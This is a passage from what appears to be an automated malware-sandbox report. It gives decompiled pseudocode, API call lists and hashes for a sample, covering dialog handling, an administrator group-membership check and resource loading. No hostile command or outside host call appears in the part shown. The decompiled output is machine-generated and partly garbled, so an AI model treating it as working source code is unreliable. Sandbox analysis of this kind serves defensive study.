                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0x1a8590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0x1a8590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E001A43D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0x1a8d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0x1a88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E001A30C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x001a3108
                                                                                                                                                                                                                                              0x001a310b
                                                                                                                                                                                                                                              0x001a31b7
                                                                                                                                                                                                                                              0x001a31ca
                                                                                                                                                                                                                                              0x001a31d0
                                                                                                                                                                                                                                              0x001a31d0
                                                                                                                                                                                                                                              0x001a31da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a31da
                                                                                                                                                                                                                                              0x001a3111
                                                                                                                                                                                                                                              0x001a3114
                                                                                                                                                                                                                                              0x001a3136
                                                                                                                                                                                                                                              0x001a3136
                                                                                                                                                                                                                                              0x001a3138
                                                                                                                                                                                                                                              0x001a313b
                                                                                                                                                                                                                                              0x001a3141
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3143
                                                                                                                                                                                                                                              0x001a3116
                                                                                                                                                                                                                                              0x001a311b
                                                                                                                                                                                                                                              0x001a314b
                                                                                                                                                                                                                                              0x001a3151
                                                                                                                                                                                                                                              0x001a3158
                                                                                                                                                                                                                                              0x001a316a
                                                                                                                                                                                                                                              0x001a3176
                                                                                                                                                                                                                                              0x001a317d
                                                                                                                                                                                                                                              0x001a318b
                                                                                                                                                                                                                                              0x001a319e
                                                                                                                                                                                                                                              0x001a31a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a31ad
                                                                                                                                                                                                                                              0x001a3120
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a312a
                                                                                                                                                                                                                                              0x001a3134
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3134
                                                                                                                                                                                                                                              0x001a312c
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 001A316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A3176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 001A317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 001A3185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 001A3190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,001A30C0), ref: 001A31A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001A31CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 0988a6d4b20449d834defc4cffd2d22af6bb44fe63f569aebc6dc389340ada31
                                                                                                                                                                                                                                              • Instruction ID: 4d27cd5332b1e367e577593b68216616c89f0f7415f62de37f3bebc99a91bb95
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0988a6d4b20449d834defc4cffd2d22af6bb44fe63f569aebc6dc389340ada31
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11D039644211BBDB216F64EC0CBAA3AA4FF4B720F504611F826D19E0DBB49A95C782
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                                                                              			E001A18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                                                                                                              				_t49 = __edx;
                                                                                                                                                                                                                                              				_t23 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                              				_t25 =  *0x1a8128; // 0x2
                                                                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t50 = 2;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if(_t25 != _t50) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					return E001A6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E001A17EE( &_v20) != 0) {
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                                                                              						 *0x1a8128 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                                              					CloseHandle(_v28);
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                                                              					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_pop(_t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                                              						LocalFree(_t52);
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if( *_t52 <= 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							FreeSid(_v32);
                                                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                              						_t50 = _t15;
                                                                                                                                                                                                                                              						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                                                                              							_t50 = _t50 + 8;
                                                                                                                                                                                                                                              							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x1a8128 = 1;
                                                                                                                                                                                                                                              						_v20 = 1;
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x001a18a3
                                                                                                                                                                                                                                              0x001a18a3
                                                                                                                                                                                                                                              0x001a18ab
                                                                                                                                                                                                                                              0x001a18b2
                                                                                                                                                                                                                                              0x001a18b5
                                                                                                                                                                                                                                              0x001a18be
                                                                                                                                                                                                                                              0x001a18c0
                                                                                                                                                                                                                                              0x001a18c6
                                                                                                                                                                                                                                              0x001a18c7
                                                                                                                                                                                                                                              0x001a18ca
                                                                                                                                                                                                                                              0x001a18cf
                                                                                                                                                                                                                                              0x001a19c9
                                                                                                                                                                                                                                              0x001a19d8
                                                                                                                                                                                                                                              0x001a19d8
                                                                                                                                                                                                                                              0x001a18df
                                                                                                                                                                                                                                              0x001a19b8
                                                                                                                                                                                                                                              0x001a19bd
                                                                                                                                                                                                                                              0x001a19bf
                                                                                                                                                                                                                                              0x001a19bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a19bd
                                                                                                                                                                                                                                              0x001a18fa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1912
                                                                                                                                                                                                                                              0x001a19aa
                                                                                                                                                                                                                                              0x001a19ad
                                                                                                                                                                                                                                              0x001a19b3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1927
                                                                                                                                                                                                                                              0x001a1927
                                                                                                                                                                                                                                              0x001a1932
                                                                                                                                                                                                                                              0x001a1936
                                                                                                                                                                                                                                              0x001a19a9
                                                                                                                                                                                                                                              0x001a19a9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a19a9
                                                                                                                                                                                                                                              0x001a194c
                                                                                                                                                                                                                                              0x001a19a2
                                                                                                                                                                                                                                              0x001a19a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a196e
                                                                                                                                                                                                                                              0x001a1970
                                                                                                                                                                                                                                              0x001a1999
                                                                                                                                                                                                                                              0x001a199c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a199c
                                                                                                                                                                                                                                              0x001a1972
                                                                                                                                                                                                                                              0x001a1972
                                                                                                                                                                                                                                              0x001a1975
                                                                                                                                                                                                                                              0x001a1984
                                                                                                                                                                                                                                              0x001a1985
                                                                                                                                                                                                                                              0x001a198a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a198c
                                                                                                                                                                                                                                              0x001a1991
                                                                                                                                                                                                                                              0x001a1996
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1996
                                                                                                                                                                                                                                              0x001a194c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001A18DD), ref: 001A181A
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001A182C
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: AllocateAndInitializeSid.ADVAPI32(001A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A18DD), ref: 001A1855
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: FreeSid.ADVAPI32(?,?,?,?,001A18DD), ref: 001A1883
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: FreeLibrary.KERNEL32(00000000,?,?,?,001A18DD), ref: 001A188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001A18EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001A18F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 001A190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 001A1918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 001A192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 001A1944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001A1964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 001A197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 001A199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A19A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A19AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 9f9119cc419719ea2a2bfb5e7983a60c8676aa3f64248d5843a1f6930e365e90
                                                                                                                                                                                                                                              • Instruction ID: 2c1ffd6aec99af169173cfb6688a75c1f0d5697a831e1b0f0f43e31a0318eda4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f9119cc419719ea2a2bfb5e7983a60c8676aa3f64248d5843a1f6930e365e90
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB313B75A0020ABFDB209FA5DD98ABFBBBDFF0A714F500429F645D2160DB309945CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x001a4699
                                                                                                                                                                                                                                              0x001a469b
                                                                                                                                                                                                                                              0x001a46a9
                                                                                                                                                                                                                                              0x001a46af
                                                                                                                                                                                                                                              0x001a46b4
                                                                                                                                                                                                                                              0x001a46bc
                                                                                                                                                                                                                                              0x001a46f9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a46f9
                                                                                                                                                                                                                                              0x001a46d9
                                                                                                                                                                                                                                              0x001a46dd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a46e5
                                                                                                                                                                                                                                              0x001a46ef
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a46f5
                                                                                                                                                                                                                                              0x001a46ff

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: 2e8b69935e318187d66fb3888982c263a33a284219ea517af8865e210013b36a
                                                                                                                                                                                                                                              • Instruction ID: 5158c0272543fe639208d0bdf628e6c4c5f4ef80567ea20615889ec0e3f07e40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e8b69935e318187d66fb3888982c263a33a284219ea517af8865e210013b36a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0186762443107BE3201BA55D4DF7B7E2CDFC7B52F444014FA4A96150CBB18881C6A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E001A17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0x1aa288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x001a17f6
                                                                                                                                                                                                                                              0x001a17fd
                                                                                                                                                                                                                                              0x001a1805
                                                                                                                                                                                                                                              0x001a180b
                                                                                                                                                                                                                                              0x001a180d
                                                                                                                                                                                                                                              0x001a1815
                                                                                                                                                                                                                                              0x001a1818
                                                                                                                                                                                                                                              0x001a1820
                                                                                                                                                                                                                                              0x001a1824
                                                                                                                                                                                                                                              0x001a182c
                                                                                                                                                                                                                                              0x001a1832
                                                                                                                                                                                                                                              0x001a1837
                                                                                                                                                                                                                                              0x001a1851
                                                                                                                                                                                                                                              0x001a1854
                                                                                                                                                                                                                                              0x001a185d
                                                                                                                                                                                                                                              0x001a1862
                                                                                                                                                                                                                                              0x001a186c
                                                                                                                                                                                                                                              0x001a1872
                                                                                                                                                                                                                                              0x001a1877
                                                                                                                                                                                                                                              0x001a187e
                                                                                                                                                                                                                                              0x001a187e
                                                                                                                                                                                                                                              0x001a1883
                                                                                                                                                                                                                                              0x001a1883
                                                                                                                                                                                                                                              0x001a185d
                                                                                                                                                                                                                                              0x001a188a
                                                                                                                                                                                                                                              0x001a188a
                                                                                                                                                                                                                                              0x001a18a2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001A18DD), ref: 001A181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001A182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(001A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A18DD), ref: 001A1855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,001A18DD), ref: 001A1883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,001A18DD), ref: 001A188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 76b987084960780573a16285f62507da1d123c54542c7c336efaaec1773a9503
                                                                                                                                                                                                                                              • Instruction ID: 197f8d0d75e1d1d817cd92553016db909f865065f030afa1f2073a2cec60572b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76b987084960780573a16285f62507da1d123c54542c7c336efaaec1773a9503
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211B675E00209BFDB119FA4ED49ABEBB78EF4A710F500169FA01E3290DB309D44CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
